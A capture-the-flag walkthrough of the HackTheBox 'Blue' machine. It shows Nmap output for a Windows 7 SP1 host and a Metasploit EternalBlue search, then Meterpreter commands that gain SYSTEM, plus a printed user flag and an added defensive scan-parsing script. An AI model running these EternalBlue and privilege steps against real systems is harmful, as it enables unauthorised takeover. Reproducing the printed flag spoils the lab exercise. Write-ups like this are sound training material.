A quick walkthrough of the "Blue" VM from HackTheBox
For this you'll need a Kali / Parrot Linux box, either as a normal machine or as a VM, a VIP account at HackTheBox, VPN access set up, and working knowledge of the Metasploit Framework and Nmap.
So, okay. You should have VPN access, and know what the IP addresses are for the VM and your workstation. The reason for this is that the IPs will change every time you access HTB, so check them so you're sure what they are. But, with that said, let's jump to it.
If you remember the stages: recon, exploit recon, attack, and post-exploitation / cleanup and note taking. We kick off with Nmap:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 12:26 CEST
Nmap scan report for 10.129.128.137
Host is up (0.032s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: -19m55s, deviation: 34m37s, median: 3s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-10T11:27:55+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-10T10:27:56
|_ start_date: 2021-04-10T10:22:23
Note that the Nmap output will be more detailed than this; mine's shortened a bit for clarity. But the one thing to take note of here is these details.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
From that output, we know we have a Windows 7 Service Pack 1 host with file and print sharing (SMB) running. So, can we find exploit code for this? Ask Google, and you will find ms17_010_eternalblue information.
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
https://www.exploit-db.com/exploits/42031
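Before following the exploit path, here is how the same Nmap output reads from the defender's side. The Python below is an added example, not part of the original walkthrough: it parses a constructed copy of the port table and the smb-os-discovery / smb-security-mode host-script lines shown above and turns them into a findings list (SMB exposed, an end-of-life Windows 7 SP1 host to check for the MS17-010 patch, SMB message signing disabled or not required).

```python
import re

# Constructed copy of the relevant lines from the scan above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
| account_used: guest
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""


def parse_scan(text):
    """Pull the fields a defender cares about out of Nmap's normal output."""
    info = {"open_ports": set(), "os": None, "signing": None, "smb2_signing": None}
    for line in text.splitlines():
        m = re.match(r"(\d+)/tcp\s+open", line)
        if m:
            info["open_ports"].add(int(m.group(1)))
        m = re.match(r"\|\s*OS:\s*(.+)", line)  # "OS CPE:" does not match this
        if m:
            info["os"] = m.group(1).strip()
        m = re.match(r"\|_?\s*message_signing:\s*(\w+)", line)
        if m:
            info["signing"] = m.group(1)
        if "message signing enabled but not required" in line.lower():
            info["smb2_signing"] = "not required"
    return info


def findings(info):
    """Turn parsed fields into (severity, message) findings for a report."""
    out = []
    if 445 in info["open_ports"]:
        out.append(("medium", "SMB (445/tcp) reachable from the scanning network"))
    if info["os"] and re.search(r"Windows 7 .*Service Pack 1", info["os"]):
        out.append(("high", "Windows 7 SP1 host (end of life): confirm MS17-010 is installed, plan retirement"))
    if info["signing"] == "disabled":
        out.append(("high", "SMB message signing disabled (smb-security-mode)"))
    if info["smb2_signing"] == "not required":
        out.append(("medium", "SMB2 message signing enabled but not required"))
    return out
```

Running `findings(parse_scan(NMAP_OUTPUT))` on the scan above yields four findings, two of them high.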
Note that the Rapid7 link points to something called a "module". We might have a Metasploit Framework module for this, so let's be lazy and launch msfconsole.
msfconsole
msf6 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
So set the options, run the check function, and see if the system is patched for EternalBlue (it won't be). If everything worked, you should get a Meterpreter session back (if that was your payload) and be in a Meterpreter shell.
meterpreter > getprivs
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
So, we got a SYSTEM account; we have taken the machine. Let's find some flags :)
meterpreter > search -f root.txt
Found 1 result...
c:\Users\Administrator\Desktop\root.txt (32 bytes)
meterpreter > search -f user.txt
Found 1 result...
c:\Users\haris\Desktop\user.txt (32 bytes)
meterpreter >
meterpreter > cat 'c:\Users\haris\Desktop\user.txt'
4c546aea7dbee75cbd71de245c8deea9
So, we're done. And yes, I do know using Metasploit is the lazy way around. If you want the long way around, find and download the EternalBlue exploit source from somewhere and try to do it manually, without using MSF.
So, happy hacking on the "Blue" VM ;)